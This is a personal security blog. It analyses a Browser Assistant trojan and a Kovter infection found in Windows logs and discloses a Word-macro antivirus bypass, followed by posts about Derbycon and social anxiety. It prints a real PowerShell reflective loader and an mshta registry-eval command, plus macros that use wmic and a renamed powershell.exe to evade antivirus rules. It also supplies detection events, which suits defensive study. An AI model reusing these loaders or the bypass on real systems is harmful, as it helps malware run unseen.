Powershell Encoded Payload In Clear Text in Windows Event Log 4688

Found something kind of interesting that analysts might want to be aware of.

For months, there's this device that kept trying to execute a Powershell payload.  I could see it in the logs of a well-known vendor.  At first it looks like this because this vendor decided everything should be in caps.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ENCODEDCOMMAND JAB3AD0AJABLAG4ADGA6AEEAUABQAEQAQQBUAEEAKWANAFWAQGBYAG8ADWBZAGUACGAGAEEACWBZAGKACWB0AGEABGB0AFWAJWA7AFSAUGBLAGYABABLAGMADABPAG8ABGAUAEEACWBZAGUABQBIAGWAEQBDADOAOGBMAG8AYQBKACGAWWB

I put in a request for them to allow that field to be upper/lower case.  So then I see this:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEAcwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB

The payload decodes to this:

$w=$env:APPDATA+'\Browser Assistant\';[ReflectionAssembly]::Load([

This vendor truncates the payload. >:(

 

I Google it - thinking I might get lucky.  It's a Browser Assistant Trojan.  https://blog.malwarebytes.com/detections/trojan-browserassistant-ps/

 

Sometimes it's hard to believe something is infected, especially if this AV solution keeps saying that it's blocking it.  I kept looking for the encoded command in Powershell logs 4103 and 4104 - no luck.

 

Found out that If I did this:  Get-WinEvent -FilterHashtable @{logname="Security";id="4688";} | Select -Expand Message | ?{$_ -like "*powershell*"} | ?{$_ -like "*Reflection*"}, I found it.  It was in clear text!  The examples on security blogs show it in it's encoded forms.  I've seen it in the logs as encoded text before.  Why is this one different?

I assume it was in clear text because when that payload was loaded into memory, it was decoded.  The event 4688 in the Security log is for process creation.  The process was actually created.  It's weird because the AV solution said it blocked it.  This has been going on since June, and I finally have proof that there's a problem.  I could try to clean it up, because I have the IOCs in that article, but the IOCs change all the time.  You'll see that the actual decoded payload doesn't match what's in that article.  It loads a specific version of .NET for starters.  The actual decoded payload is this:

 

powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"

I haven't found what keeps starting this.  Looks like I'll have to keep looking.

###Update####

Been a while since I touched this blog.  I've been so busy with cyber defense, ctfs, holiday hack.  Never thought that this would be my job, but it is.  Sometimes I feel a little over my head.  I wanted to revisit this for a while.  I did find out what was causing it to execute over a year ago.  The process that kept launching this was a variant of Kovter.  https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless

Found some other indicators and an obfuscated binary in the registry.

"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajf

l");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";" <--this kept running over and over again.

HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers

Name: Images <base64encoded binary>

HKLM:\Software\fcscgkz

lqje: <obfuscated binary> - This isn't base64 encoded.  Trust me, you'll know if you see it.  It looks random.

flwxqgajfl: <base64 encoded strings><bunch of hex that looks like shell code.>

uzksi: S6xXx9mdNmjlJA==

ppaj: Q/cIl47JZi1rc8ijJL1FKrCPtHaJv7U=

ggxo: E/BWwN7BYJWCwSskHqL/kjk=

boadvfk: FqcLk4zANi4kDWir28Afgte9/ujOKjBjpDNsCg5OyaP7nnOuSgzYVDskh2OyNaD1KtQqcCIosyWWjkLoFIwTMnlSD1c=

fthhhtkk:<base64 encoded binary>

oass: <base64 encoded binary>

3ecf9d7c3f: what looks like an array of decimals.  Might be byte code or characters in decimal form.

I would hazard a guess that those keys are probably randomized, so they might not look the same from sample to sample.

AV Bypass

Found a way to bypass a well-known Enterprise AV solution a while ago.  I'm afraid to disclose it to anyone other than the vendor.  I disclosed it to that particular vendor, and they haven't quite solved the problem, yet.  I don't want to cause anyone any undue hardship from disclosing this particular vulnerability, but it's probably already well-known.  The difficulty in solving this is that the way to bypass this AV uses Windows built-in tools and it produces a lot of false positives.  This vendor thought that they had a solution in a signature update, but it didn't cover the wide variety of ways that this particular Windows built-in tool could be used.  I'm horrified by this, but not exactly surprised.  This is why defense in depth is so vitally important.  Where one solution fails, another will succeed.  I wish I could say more.  I can't quite figure out how it works.  I'm scratching my head because it shouldn't work.  I put protections in place by making custom rules, and it's not firing on any of the custom rules even though it should.  Thought I had an idea of why.  That was proven to be wrong.  Wish I could figure this out because if I found it, I'm fairly certain the bad guys have probably already found it.  I guess I can release the exploit.  Someone will figure out who the vendor is.  I just hope that by releasing this, a fix can be made.  Some of you will say, "Well, Emotet does that..."  You're right - but does it do it in this exact way?  Emotet was what inspired me to try this.  And yes, I know, this isn't l33t.

Create a macro in Word and add this technique:

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("wmic process call create 'powershell.exe chrome.exe https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub


Here's another one bypassing a custom rule telling my AV solution not to allow winword.exe to run powershell.exe by copying powershell.exe to my Desktop and renaming it to dog.exe

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("C:\Users\Bob\Desktop\dog.exe Start-Process chrome.exe 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub

Showing these as well - Windows Events - to help detect this.

Process Create:
UtcTime: 2019-09-23 20:47:36.217
ProcessGuid: {}
ProcessId: 22412
Image: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
CommandLine: "C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE" /n "C:\Users\BOB\Downloads\Bob.docm" /o ""

CurrentDirectory: C:\WINDOWS\system32\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 7088
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: "C:\Windows\explorer.exe" /LOADSAVEDWINDOW

Process Create:
UtcTime: 2019-09-23 20:47:39.828
ProcessGuid: {}
ProcessId: 1136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
CurrentDirectory: c:\windows\system32\spool\drivers\x64\3\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 6868
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding

Final Derbycon?

Can't believe it's the end.  Only 2nd year that I've gone.  Never expected to go, but turns out that my boss really likes this con, and I can see why.  Plenty of people are nice, and friendly.  I posted about awkwardness really early yesterday morning, but that was my personal problem, not the problem of others.

Only thing was a vendor who was a little rude, but that's not Derby's fault.  That reflects badly on his company.  I tweeted about it.   Also, I'm not saying he's the devil incarnate.  Seems obvious to me that I was there to look at the product, but maybe he didn't realize.  It's possible.

This week has been a huge dose of humble pie.  It's yet again confirmed that I still need to learn so much.  Yeah, I know, shocker.  I'd like to try to get an OSCP someday- mostly just to see if it's possible.

Had Practical Burp:  Advanced Techniques (PBAT) training this week - it's from here:  https://www.lanmaster53.com/training/.  He was offering it at Derbycon, and in the ticket race, that's what my boss could get.  Strangely enough, it does kind of mesh with my job.  I really need to study how common web apps work if I really want to get the most out of that training.  I know the basics - OWASP Top 10, some of what they mean, and some about how they work, but in order to execute them properly, I need to know the underpinnings of the apps.  What weird caveats does each language have that I can leverage?  Kind of like the weird php comparison operators - or that you can use variables without the $ sign in some cases. 

I tried the Derbycon CTF.  It's meant for beginner up, but there's not really a lot of guidance to it.  You get a scope of IPs and have at it.  I figured out some of it, but if it's any indication of my skills, I could use some more practice.  I did learn something new, though, so that was cool.  Almost gave up on the CTF.  The Wireless connection was slow.  Some machines that were up weren't showing as up.  Some kept going down right after they said that they were up.  That was a little bit of a nightmare.  Glad that I didn't give up though - considering I learned something.  I think that this was good practice to expect for the OSCP.  I hear you get study material, you study it so long, then you have to try to pwn a certain number of machines in 24 hours and you write a report in that time.  I hear most people don't pass it first time around.  I'm a little afraid to try a first time because what if I never pass it?   I guess I should think like that movie - "If I can't go on, I'll go on"?

Both concerts were awesome.  I'm so glad I went.  Discovered new music that I like.  It's by Infected Mushroom.  Didn't know who they were before attending.

Signed a Trevor memorial card.  That was so fun watching that escalate 3 years ago on Twitter - then to see the memorial last year, and the memorial this year.  Trevor will always be in our hearts. :D  #trevorforget

I'm going to miss Derby.  It just started for me, but the impact it's had...  I hope someone tries to bring it back.

The Spark

3:30AM.  Going to be really tired in the morning.  Having trouble sleeping.  One of Trevor's family members is in my hotel room - not sure how it got in here, but the things freak me out.  Sometimes you can be surrounded by people and feel lonelier than ever.  I wish I had that spark.  You know, the ease that some people have relating to each other and having conversations with each other.  I'd like to be positive and inspirational all the time, but I just can't be.  Not when I don't feel positive or inspirational.  Trying to enjoy the last Derbycon as much as I can, but it's not easy.  When I'm in huge groups, I just feel like I take up too much space.  I try to shy away from people.  I'm awkward when I talk to people as well.  I have plenty going on in my head, but not much to say.  And I keep saying the dumbest things.  Someone I look up to actually said, "Hi" to me.  (I'm still surprised when people I look up to say "Hi" to me.)  I said something and I guess he didn't get the reference, or he thinks I'm weird - maybe both.  I am weird, but that's besides the point.  I was referencing a movie I really like, an old black and white film, and he'd talked about having conversations with imaginary people/figures and well, that's what the movie was about.  I realized that it could be taken offensively.  The guy in the movie drank a lot and people thought that he was insane.  I doubt that this particular person reads my blog/journal, but if he does, I did not mean to offend you.  I apologize.

Feels like I'm always saying sorry for something.  Constant foot in my mouth type problem.  Just for future reference, if I say something offensive, I'm usually not intending to be offensive.  I just don't realize it's offensive until later.  I blame part of this on my upbringing.  I'd rather not get into personal details, but suffice it to say, it wasn't the best. 

At least I felt better in the concert.  That was loud enough that I didn't have to talk to anyone. 

This social stuff is why I prefer writing and singing oddly enough.  I don't have to immediately send out what comes into my head.  I can reflect on it and consider how other's might interpret it before sending it out.  As for singing, I believe I've mentioned this before, it's someone else's words, and people tend to look past your appearance if they think you have an ok voice.  It doesn't even have to be a mediocre voice - just generally pleasant. 

I'm writing this because this is kind of a journal to me - not really something I expect people to read.  But if they do, it's not a big deal.  The issue I have with myself, is my mind.  Most people I say stupid or weird things to probably don't dwell on what I said, they probably think, "OK, she's a little weird", and they move on.  But I replay the dumb things.  Kind of the "Dumbest Things I've Said Playlist". 

If I was giving advice to someone, I'd tell them to not dwell on this.  Seems like I need to take my own advice sometimes.  If someone actually does read this, if you're wondering, "If being around crowds gives you such anxiety, then why go?"  I won't be successful with a social roadblock.  If no one knows who I am, how can they trust me enough to hire me, be my friend, or my mentor?  So, what do you do?  Mingle - just try not to be weird like me.